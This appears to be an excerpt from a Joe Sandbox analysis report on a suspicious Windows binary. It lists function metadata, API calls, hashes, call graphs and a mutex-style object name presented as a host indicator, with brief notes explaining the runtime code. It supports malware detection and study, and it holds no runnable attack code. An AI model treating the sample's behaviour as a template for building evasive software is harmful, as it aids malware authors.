                                                                • String ID: CCG
                                                                • API String ID: 0-1584390748
                                                                • Opcode ID: 981209e0ac3ddb0b4a096b9b655f1816affae7da42ff6b0e70024d2a530dabbb
                                                                • Instruction ID: d690d5b4cdb5346f460efd0d123a74e525035068cf26049d8b7b32d8b4fea1d8
                                                                • Opcode Fuzzy Hash: 981209e0ac3ddb0b4a096b9b655f1816affae7da42ff6b0e70024d2a530dabbb
                                                                • Instruction Fuzzy Hash: 77217431F0C68682FA765A1597A43791181AF887E6F258536DBBFC33D4FE2CB8814281

                                                                Control-flow Graph

                                                                APIs
                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6CD201247), ref: 00007FF6CD2019F9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                • API String ID: 544645111-395989641
                                                                • Opcode ID: 35077ec1f8cf01a8bdaf316ebed73980ffe83aab56c7039b9b06064fa5820d5c
                                                                • Instruction ID: d4dc5c281669871f9b89574493c84b81a238a3c32cb4ec0aed995581fbedd3b1
                                                                • Opcode Fuzzy Hash: 35077ec1f8cf01a8bdaf316ebed73980ffe83aab56c7039b9b06064fa5820d5c
                                                                • Instruction Fuzzy Hash: 0C516A31F0858686EB119F25DA916A92761BB04BD6F488132DBBEC7795EF3CF482C700

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID: fprintf
                                                                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                • API String ID: 383729395-3474627141
                                                                • Opcode ID: d62a8b23ab6774a9e186f29f9d1afd359dea50ccd112c61e3c424bc7fed516e9
                                                                • Instruction ID: 97eb1cf27272dfd5532ac9e63a87294f22d27207cc1c60b51785a90a6af2c9c9
                                                                • Opcode Fuzzy Hash: d62a8b23ab6774a9e186f29f9d1afd359dea50ccd112c61e3c424bc7fed516e9
                                                                • Instruction Fuzzy Hash: 2FF06832F1C9C582E611AF64AA510B9A361EB597C2F549231DFDED7651EF1CF5428300

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                • String ID:
                                                                • API String ID: 682475483-0
                                                                • Opcode ID: 69e6d2f17c288388de4c357c6fbd6a7398df649ea9b9e478042f8ea96f6d9847
                                                                • Instruction ID: 3facc2831f2e78fd41f7fecd92919be15005d8d6247298a786fa10310233e8ec
                                                                • Opcode Fuzzy Hash: 69e6d2f17c288388de4c357c6fbd6a7398df649ea9b9e478042f8ea96f6d9847
                                                                • Instruction Fuzzy Hash: B8012531B0958282F6159F41EE541395270BF48BD6F844033CBADC3AA5FF6CB9518340

                                                                Execution Graph

                                                                Execution Coverage: 2.4%
                                                                Dynamic/Decrypted Code Coverage: 0%
                                                                Signature Coverage: 0%
                                                                Total number of Nodes: 826
                                                                Total number of Limit Nodes: 2
2471->2472 2473 140001394 2 API calls 2472->2473 2474 1400014c7 2473->2474 2475 140001394 2 API calls 2474->2475 2476 1400014d6 2475->2476 2477 1400014e5 2476->2477 2478 140001394 2 API calls 2476->2478 2479 140001394 2 API calls 2477->2479 2478->2477 2480 1400014ef 2479->2480 2481 1400014f4 2480->2481 2482 140001394 2 API calls 2480->2482 2483 140001394 2 API calls 2481->2483 2482->2481 2484 1400014fe 2483->2484 2485 140001503 2484->2485 2486 140001394 2 API calls 2484->2486 2487 140001394 2 API calls 2485->2487 2486->2485 2488 14000150d 2487->2488 2489 140001394 2 API calls 2488->2489 2490 140001512 2489->2490 2491 140001394 2 API calls 2490->2491 2492 140001521 2491->2492 2493 140001394 2 API calls 2492->2493 2494 140001530 2493->2494 2495 140001394 2 API calls 2494->2495 2496 14000153f 2495->2496 2497 140001394 2 API calls 2496->2497 2498 14000154e 2497->2498 2499 140001394 2 API calls 2498->2499 2500 14000155d 2499->2500 2501 140001394 2 API calls 2500->2501 2502 14000156c 2501->2502 2503 140001394 2 API calls 2502->2503 2504 14000157b 2503->2504 2505 140001394 2 API calls 2504->2505 2506 14000158a 2505->2506 2507 140001394 2 API calls 2506->2507 2508 140001599 2507->2508 2509 140001394 2 API calls 2508->2509 2510 1400015a8 2509->2510 2511 140001394 2 API calls 2510->2511 2512 1400015b7 2511->2512 2513 140001394 2 API calls 2512->2513 2514 1400015c6 2513->2514 2515 140001394 2 API calls 2514->2515 2516 1400015d5 2515->2516 2517 140001394 2 API calls 2516->2517 2518 1400015e4 2517->2518 2519 140001394 2 API calls 2518->2519 2520 1400015f3 2519->2520 2520->2212 2521 140001440 2520->2521 2522 140001394 2 API calls 2521->2522 2523 14000144f 2522->2523 2524 140001394 2 API calls 2523->2524 2525 14000145e 2524->2525 2526 140001394 2 API calls 2525->2526 2527 14000146d 2526->2527 2528 140001394 2 API calls 2527->2528 2529 14000147c 2528->2529 2530 140001394 2 API calls 2529->2530 2531 14000148b 2530->2531 2532 140001394 2 API calls 2531->2532 2533 14000149a 
2532->2533 2534 140001394 2 API calls 2533->2534 2535 1400014a9 2534->2535 2536 140001394 2 API calls 2535->2536 2537 1400014b8 2536->2537 2538 140001394 2 API calls 2537->2538 2539 1400014c7 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400014d6 2540->2541 2542 1400014e5 2541->2542 2543 140001394 2 API calls 2541->2543 2544 140001394 2 API calls 2542->2544 2543->2542 2545 1400014ef 2544->2545 2546 1400014f4 2545->2546 2547 140001394 2 API calls 2545->2547 2548 140001394 2 API calls 2546->2548 2547->2546 2549 1400014fe 2548->2549 2550 140001503 2549->2550 2551 140001394 2 API calls 2549->2551 2552 140001394 2 API calls 2550->2552 2551->2550 2553 14000150d 2552->2553 2554 140001394 2 API calls 2553->2554 2555 140001512 2554->2555 2556 140001394 2 API calls 2555->2556 2557 140001521 2556->2557 2558 140001394 2 API calls 2557->2558 2559 140001530 2558->2559 2560 140001394 2 API calls 2559->2560 2561 14000153f 2560->2561 2562 140001394 2 API calls 2561->2562 2563 14000154e 2562->2563 2564 140001394 2 API calls 2563->2564 2565 14000155d 2564->2565 2566 140001394 2 API calls 2565->2566 2567 14000156c 2566->2567 2568 140001394 2 API calls 2567->2568 2569 14000157b 2568->2569 2570 140001394 2 API calls 2569->2570 2571 14000158a 2570->2571 2572 140001394 2 API calls 2571->2572 2573 140001599 2572->2573 2574 140001394 2 API calls 2573->2574 2575 1400015a8 2574->2575 2576 140001394 2 API calls 2575->2576 2577 1400015b7 2576->2577 2578 140001394 2 API calls 2577->2578 2579 1400015c6 2578->2579 2580 140001394 2 API calls 2579->2580 2581 1400015d5 2580->2581 2582 140001394 2 API calls 2581->2582 2583 1400015e4 2582->2583 2584 140001394 2 API calls 2583->2584 2585 1400015f3 2584->2585 2585->2212 2585->2219 2587 1400014e5 2586->2587 2588 140001394 2 API calls 2586->2588 2589 140001394 2 API calls 2587->2589 2588->2587 2590 1400014ef 2589->2590 2591 1400014f4 2590->2591 2592 140001394 2 API calls 2590->2592 2593 140001394 2 API calls 2591->2593 2592->2591 2594 1400014fe 
2593->2594 2595 140001503 2594->2595 2596 140001394 2 API calls 2594->2596 2597 140001394 2 API calls 2595->2597 2596->2595 2598 14000150d 2597->2598 2599 140001394 2 API calls 2598->2599 2600 140001512 2599->2600 2601 140001394 2 API calls 2600->2601 2602 140001521 2601->2602 2603 140001394 2 API calls 2602->2603 2604 140001530 2603->2604 2605 140001394 2 API calls 2604->2605 2606 14000153f 2605->2606 2607 140001394 2 API calls 2606->2607 2608 14000154e 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000155d 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000156c 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000157b 2613->2614 2615 140001394 2 API calls 2614->2615 2616 14000158a 2615->2616 2617 140001394 2 API calls 2616->2617 2618 140001599 2617->2618 2619 140001394 2 API calls 2618->2619 2620 1400015a8 2619->2620 2621 140001394 2 API calls 2620->2621 2622 1400015b7 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015c6 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015d5 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015e4 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015f3 2629->2630 2630->2231 2632 140001394 2 API calls 2631->2632 2633 14000158a 2632->2633 2634 140001394 2 API calls 2633->2634 2635 140001599 2634->2635 2636 140001394 2 API calls 2635->2636 2637 1400015a8 2636->2637 2638 140001394 2 API calls 2637->2638 2639 1400015b7 2638->2639 2640 140001394 2 API calls 2639->2640 2641 1400015c6 2640->2641 2642 140001394 2 API calls 2641->2642 2643 1400015d5 2642->2643 2644 140001394 2 API calls 2643->2644 2645 1400015e4 2644->2645 2646 140001394 2 API calls 2645->2646 2647 1400015f3 2646->2647 2647->2231 2649 140001394 2 API calls 2648->2649 2650 1400015b7 2649->2650 2651 140001394 2 API calls 2650->2651 2652 1400015c6 2651->2652 2653 140001394 2 API calls 2652->2653 2654 1400015d5 2653->2654 2655 140001394 2 API calls 2654->2655 2656 1400015e4 2655->2656 2657 140001394 2 API calls 
2656->2657 2658 1400015f3 2657->2658 2658->2231 2660 140001394 2 API calls 2659->2660 2661 140001530 2660->2661 2662 140001394 2 API calls 2661->2662 2663 14000153f 2662->2663 2664 140001394 2 API calls 2663->2664 2665 14000154e 2664->2665 2666 140001394 2 API calls 2665->2666 2667 14000155d 2666->2667 2668 140001394 2 API calls 2667->2668 2669 14000156c 2668->2669 2670 140001394 2 API calls 2669->2670 2671 14000157b 2670->2671 2672 140001394 2 API calls 2671->2672 2673 14000158a 2672->2673 2674 140001394 2 API calls 2673->2674 2675 140001599 2674->2675 2676 140001394 2 API calls 2675->2676 2677 1400015a8 2676->2677 2678 140001394 2 API calls 2677->2678 2679 1400015b7 2678->2679 2680 140001394 2 API calls 2679->2680 2681 1400015c6 2680->2681 2682 140001394 2 API calls 2681->2682 2683 1400015d5 2682->2683 2684 140001394 2 API calls 2683->2684 2685 1400015e4 2684->2685 2686 140001394 2 API calls 2685->2686 2687 1400015f3 2686->2687 2687->2231 2689 140001394 2 API calls 2688->2689 2690 140001431 2689->2690 2691 140001394 2 API calls 2690->2691 2692 140001440 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000144f 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000145e 2695->2696 2697 140001394 2 API calls 2696->2697 2698 14000146d 2697->2698 2699 140001394 2 API calls 2698->2699 2700 14000147c 2699->2700 2701 140001394 2 API calls 2700->2701 2702 14000148b 2701->2702 2703 140001394 2 API calls 2702->2703 2704 14000149a 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400014a9 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400014b8 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400014c7 2709->2710 2711 140001394 2 API calls 2710->2711 2712 1400014d6 2711->2712 2713 1400014e5 2712->2713 2714 140001394 2 API calls 2712->2714 2715 140001394 2 API calls 2713->2715 2714->2713 2716 1400014ef 2715->2716 2717 1400014f4 2716->2717 2718 140001394 2 API calls 2716->2718 2719 140001394 2 API calls 2717->2719 2718->2717 2720 1400014fe 
2719->2720 2721 140001503 2720->2721 2722 140001394 2 API calls 2720->2722 2723 140001394 2 API calls 2721->2723 2722->2721 2724 14000150d 2723->2724 2725 140001394 2 API calls 2724->2725 2726 140001512 2725->2726 2727 140001394 2 API calls 2726->2727 2728 140001521 2727->2728 2729 140001394 2 API calls 2728->2729 2730 140001530 2729->2730 2731 140001394 2 API calls 2730->2731 2732 14000153f 2731->2732 2733 140001394 2 API calls 2732->2733 2734 14000154e 2733->2734 2735 140001394 2 API calls 2734->2735 2736 14000155d 2735->2736 2737 140001394 2 API calls 2736->2737 2738 14000156c 2737->2738 2739 140001394 2 API calls 2738->2739 2740 14000157b 2739->2740 2741 140001394 2 API calls 2740->2741 2742 14000158a 2741->2742 2743 140001394 2 API calls 2742->2743 2744 140001599 2743->2744 2745 140001394 2 API calls 2744->2745 2746 1400015a8 2745->2746 2747 140001394 2 API calls 2746->2747 2748 1400015b7 2747->2748 2749 140001394 2 API calls 2748->2749 2750 1400015c6 2749->2750 2751 140001394 2 API calls 2750->2751 2752 1400015d5 2751->2752 2753 140001394 2 API calls 2752->2753 2754 1400015e4 2753->2754 2755 140001394 2 API calls 2754->2755 2756 1400015f3 2755->2756 2756->2231 2758 140001394 2 API calls 2757->2758 2759 140001440 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000144f 2760->2761 2762 140001394 2 API calls 2761->2762 2763 14000145e 2762->2763 2764 140001394 2 API calls 2763->2764 2765 14000146d 2764->2765 2766 140001394 2 API calls 2765->2766 2767 14000147c 2766->2767 2768 140001394 2 API calls 2767->2768 2769 14000148b 2768->2769 2770 140001394 2 API calls 2769->2770 2771 14000149a 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400014a9 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400014b8 2774->2775 2776 140001394 2 API calls 2775->2776 2777 1400014c7 2776->2777 2778 140001394 2 API calls 2777->2778 2779 1400014d6 2778->2779 2780 1400014e5 2779->2780 2781 140001394 2 API calls 2779->2781 2782 140001394 2 API calls 2780->2782 
2781->2780 2783 1400014ef 2782->2783 2784 1400014f4 2783->2784 2785 140001394 2 API calls 2783->2785 2786 140001394 2 API calls 2784->2786 2785->2784 2787 1400014fe 2786->2787 2788 140001503 2787->2788 2789 140001394 2 API calls 2787->2789 2790 140001394 2 API calls 2788->2790 2789->2788 2791 14000150d 2790->2791 2792 140001394 2 API calls 2791->2792 2793 140001512 2792->2793 2794 140001394 2 API calls 2793->2794 2795 140001521 2794->2795 2796 140001394 2 API calls 2795->2796 2797 140001530 2796->2797 2798 140001394 2 API calls 2797->2798 2799 14000153f 2798->2799 2800 140001394 2 API calls 2799->2800 2801 14000154e 2800->2801 2802 140001394 2 API calls 2801->2802 2803 14000155d 2802->2803 2804 140001394 2 API calls 2803->2804 2805 14000156c 2804->2805 2806 140001394 2 API calls 2805->2806 2807 14000157b 2806->2807 2808 140001394 2 API calls 2807->2808 2809 14000158a 2808->2809 2810 140001394 2 API calls 2809->2810 2811 140001599 2810->2811 2812 140001394 2 API calls 2811->2812 2813 1400015a8 2812->2813 2814 140001394 2 API calls 2813->2814 2815 1400015b7 2814->2815 2816 140001394 2 API calls 2815->2816 2817 1400015c6 2816->2817 2818 140001394 2 API calls 2817->2818 2819 1400015d5 2818->2819 2820 140001394 2 API calls 2819->2820 2821 1400015e4 2820->2821 2822 140001394 2 API calls 2821->2822 2823 1400015f3 2822->2823 2823->2231

                                                                Callgraph

                                                                callgraph (function-level call edges rendered from the graph image, grouped by caller; image base 0x140000000)
                                                                • 0x140001000 → 0x140001E00, 0x140001750, 0x140001FB0, 0x140001FC0
                                                                • 0x140001140 → 0x140001160
                                                                • 0x140001160 → 0x140001160 (recursive), 0x140003150, 0x140001870, 0x140001880, 0x140001F90, 0x1400016C0
                                                                • 0x140001760 → 0x1400020E0; 0x1400017E0 → 0x1400020E0
                                                                • 0x140001800 → 0x140002290; 0x140001D40 → 0x140002290
                                                                • 0x140001880 → 0x140002420, 0x140001D40, 0x140002660, 0x140001BA0
                                                                • 0x140001A70, 0x140001AB3, 0x140001AC3, 0x140001AD4, 0x140001AE4 → 0x140001D40, 0x140001BA0
                                                                • 0x140001BA0 → 0x140001D40, 0x1400023B0, 0x1400024D0
                                                                • 0x140001E65, 0x140001F47, 0x140002194 → 0x140001870
                                                                • 0x140002F00 → 0x140001370
                                                                • 0x140003150 → 0x140002F00, 0x140002660, 0x1400026E0, 0x140001370, 0x140005A70, 0x1400016C0 and the stubs 0x140001422, 0x140001431, 0x140001440, 0x14000145E, 0x14000146D, 0x1400014A9, 0x1400014D6, 0x140001503, 0x140001521, 0x140001530, 0x14000153F, 0x14000156C, 0x14000157B, 0x1400015A8
                                                                • 0x1400026E0 → 0x140002660, 0x140001370, 0x140005A70 and the stubs 0x14000145E, 0x1400014A9, 0x1400014C7, 0x1400014E5, 0x1400014F4, 0x140001503, 0x140001512, 0x14000155D
                                                                • Stubs whose only callee is 0x140001394 (20 callers): 0x140001404, 0x140001422, 0x140001431, 0x140001440, 0x14000145E, 0x14000146D, 0x1400014A9, 0x1400014C7, 0x1400014D6, 0x1400014E5, 0x1400014F4, 0x140001503, 0x140001512, 0x140001521, 0x140001530, 0x14000153F, 0x14000155D, 0x14000156C, 0x14000157B, 0x1400015A8
                                                                • 0x140001394 → 0x140005D30, 0x140005A80; 0x140005D30 → 0x140005A70; 0x140005A80 → 0x140005A70
                                                                • Functions with no callees in the graph (59): 0x1400010F0, 0x140001370, 0x140001650, 0x1400016C0, 0x140001750, 0x1400017D0, 0x140001870, 0x140001E00, 0x140001E10, 0x140001F90, 0x140001FA0, 0x140001FB0, 0x140001FC0, 0x140001FD0, 0x140002050, 0x1400020E0, 0x140002104, 0x14000216F, 0x14000219E, 0x140002290, 0x1400022B0, 0x1400022E0, 0x140002320, 0x1400023B0, 0x140002420, 0x140002460, 0x1400024D0, 0x140002500, 0x140002590, 0x140002660, 0x140002691, 0x1400026B0, 0x1400026D0, 0x140003051, 0x140003070, 0x140003090, 0x1400030B1, 0x1400030F1, 0x140003110, 0x140003130, 0x140005751, 0x140005771, 0x140005791, 0x1400057B1, 0x1400057D1, 0x140005801, 0x140005821, 0x140005841, 0x140005861, 0x140005881, 0x140005890, 0x1400058B1, 0x1400058E1, 0x140005921, 0x140005991, 0x1400059B1, 0x1400059F1, 0x140005A50, 0x140005A70

                                                                Control-flow Graph

                                                                APIs
                                                                • NtRecoverResourceManager.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                Memory Dump Source
                                                                • Source File: 00000023.00000002.2735499054.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                • Associated: 00000023.00000002.2735474655.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                • Associated: 00000023.00000002.2735535180.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                • Associated: 00000023.00000002.2735557859.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                • Associated: 00000023.00000002.2735583788.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                Similarity
                                                                • API ID: ManagerRecoverResource
                                                                • String ID:
                                                                • API String ID: 670294642-0
                                                                • Opcode ID: 246d552ccf35dba0a72f9642a2b170f14ce02e0c7d88dfc41b5b4cdba97dde56
                                                                • Instruction ID: ff33f27b0a026a04f7ab3915fd0df5fef9901e61afa9e48d9c8bca05f8c78e03
                                                                • Opcode Fuzzy Hash: 246d552ccf35dba0a72f9642a2b170f14ce02e0c7d88dfc41b5b4cdba97dde56
                                                                • Instruction Fuzzy Hash: 67F09DB2608B408AEA12DB52F89579A77A0F38D7C0F00991ABBC843735DB38C190CB80

                                                                Control-flow Graph

                                                                control_flow_graph 311 1400026e0-14000273b call 140002660 315 140002741-14000274b 311->315 316 14000280e-14000285e call 14000155d 311->316 318 140002774-14000277a 315->318 321 140002953-14000297b call 1400014c7 316->321 322 140002864-140002873 316->322 318->316 320 140002780-140002787 318->320 323 140002789-140002792 320->323 324 140002750-140002752 320->324 339 140002986-1400029c8 call 140001503 call 140005a70 321->339 340 14000297d 321->340 325 140002eb7-140002ef4 call 140001370 322->325 326 140002879-140002888 322->326 329 140002794-1400027ab 323->329 330 1400027f8-1400027fb 323->330 327 14000275a-14000276e 324->327 331 1400028e4-14000294e wcsncmp call 1400014e5 326->331 332 14000288a-1400028dd 326->332 327->316 327->318 335 1400027f5 329->335 336 1400027ad-1400027c2 329->336 330->327 331->321 332->331 335->330 341 1400027d0-1400027d7 336->341 349 140002e49-140002e84 call 140001370 339->349 350 1400029ce-1400029d5 339->350 340->339 342 1400027d9-1400027f3 341->342 343 140002800-140002809 341->343 342->335 342->341 343->327 353 1400029d7-140002a0c 349->353 357 140002e8a 349->357 352 140002a13-140002a43 wcscpy wcscat wcslen 350->352 350->353 355 140002a45-140002a76 wcslen 352->355 356 140002a78-140002aa5 352->356 353->352 358 140002aa8-140002abf wcslen 355->358 356->358 357->352 359 140002ac5-140002ad8 358->359 360 140002e8f-140002eab call 140001370 358->360 362 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 359->362 363 140002ada-140002aee 359->363 360->325 381 140002dfd-140002e1b call 140001512 362->381 382 140002e20-140002e48 call 14000145e 362->382 363->362 381->382
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000023.00000002.2735499054.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                • Associated: 00000023.00000002.2735474655.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                • Associated: 00000023.00000002.2735535180.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                • Associated: 00000023.00000002.2735557859.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                • Associated: 00000023.00000002.2735583788.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                Similarity
                                                                • API ID: wcslen$wcscatwcscpywcsncmp
                                                                • String ID: 0$X$\BaseNamedObjects\tkseuvkdyhuolcqzzgybkevs$`
                                                                \BaseNamedObjects\tkseuvkdyhuolcqzzgybkevs is an object-manager path in the namespace where named mutexes, events and sections live; 0x1400026E0 references it alongside the wcscpy/wcscat/wcslen and wcsncmp calls in the graph above. Such a name is a sample-specific host indicator: it can be checked in the live object namespace (WinObj, or handle enumeration under \BaseNamedObjects) on machines suspected of running this sample.
                                                                • API String ID: 597572034-3083454489
                                                                • Opcode ID: c71879c748ce08ff241a11e008b9fa7488b28d2c1813075cebcebcb43809f47e
                                                                • Instruction ID: 8341af8badf0aad3820a668801f8e5507c0d7650d075db2df4f51631e5db4636
                                                                • Opcode Fuzzy Hash: c71879c748ce08ff241a11e008b9fa7488b28d2c1813075cebcebcb43809f47e
                                                                • Instruction Fuzzy Hash: 801248B2608BC081E762CB16F8443EAB7A4F789794F414215EBA857BF5EF78C189C700

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000023.00000002.2735499054.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                • Associated: 00000023.00000002.2735474655.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                • Associated: 00000023.00000002.2735535180.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                • Associated: 00000023.00000002.2735557859.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                • Associated: 00000023.00000002.2735583788.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                Similarity
                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                • String ID:
                                                                • API String ID: 2643109117-0
                                                                • Opcode ID: 4d28af5c21eba74edab072e0801bccbc19f82fe5b468f8debcdefa21a6aa934c
                                                                • Instruction ID: 73c3b68e98ff42000a1af03c456dc8c34f947af47c306e20a6dfbd1f0f7b6b39
                                                                • Opcode Fuzzy Hash: 4d28af5c21eba74edab072e0801bccbc19f82fe5b468f8debcdefa21a6aa934c
                                                                • Instruction Fuzzy Hash: D05133B1611A4085FB12EF27F9947EA23A4AB8DBC0F849121FB4D873B6DE38C4958300

                                                                Control-flow Graph

                                                                control_flow_graph 427 140001ba0-140001bc0 428 140001bc2-140001bd7 427->428 429 140001c09 427->429 430 140001be9-140001bf1 428->430 431 140001c0c-140001c17 call 1400023b0 429->431 432 140001bf3-140001c02 430->432 433 140001be0-140001be7 430->433 437 140001cf4-140001cfe call 140001d40 431->437 438 140001c1d-140001c6c call 1400024d0 VirtualQuery 431->438 432->433 435 140001c04 432->435 433->430 433->431 439 140001cd7-140001cf3 memcpy 435->439 442 140001d03-140001d1e call 140001d40 437->442 438->442 445 140001c72-140001c79 438->445 446 140001d23-140001d38 GetLastError call 140001d40 442->446 447 140001c7b-140001c7e 445->447 448 140001c8e-140001c97 445->448 450 140001cd1 447->450 451 140001c80-140001c83 447->451 452 140001ca4-140001ccf VirtualProtect 448->452 453 140001c99-140001c9c 448->453 450->439 451->450 455 140001c85-140001c8a 451->455 452->446 452->450 453->450 456 140001c9e 453->456 455->450 457 140001c8c 455->457 456->452 457->456
                                                                APIs
                                                                • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                • memcpy.MSVCRT ref: 0000000140001CE0
                                                                • GetLastError.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000023.00000002.2735499054.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                • Associated: 00000023.00000002.2735474655.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                • Associated: 00000023.00000002.2735535180.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                • Associated: 00000023.00000002.2735557859.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                • Associated: 00000023.00000002.2735583788.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                Similarity
                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                These three messages, together with the VirtualQuery → VirtualProtect → memcpy → GetLastError sequence in the graph above, are the error strings of the mingw-w64 CRT's pseudo-relocation routine (pseudo-reloc.c), so 0x140001BA0 is compiler runtime support that writes import fixups into the image at start-up, not sample-specific logic; it also points to a GCC/MinGW-built binary.
                                                                • API String ID: 2595394609-2123141913
                                                                • Opcode ID: 7c9fb9a4f76ecc7cf27a0d25185f2cd29559559c3a99ec63fa7b5d9e1f40a91c
                                                                • Instruction ID: 7b5486fcc9d014d6dab15f154c2210ae67501804c1c0d462d84bfb5dee9a1a34
                                                                • Opcode Fuzzy Hash: 7c9fb9a4f76ecc7cf27a0d25185f2cd29559559c3a99ec63fa7b5d9e1f40a91c
                                                                • Instruction Fuzzy Hash: D04143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700

Control-flow Graph
• Graph rendering not preserved; basic blocks span 140002104-140002280 and reference EnterCriticalSection, LeaveCriticalSection, TlsGetValue, GetLastError and DeleteCriticalSection
Similarity
• API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
• String ID:
• API String ID: 926137887-0
• Opcode ID: 23b68bb42b0f82039d4d5f8cf07ce6922b44f5be1f238decd1318aa66a56883f
• Instruction ID: 9033c5f26b2ab15fd698305dcd7e0a279ae8f825f4298b08d7f12cd91aaca946
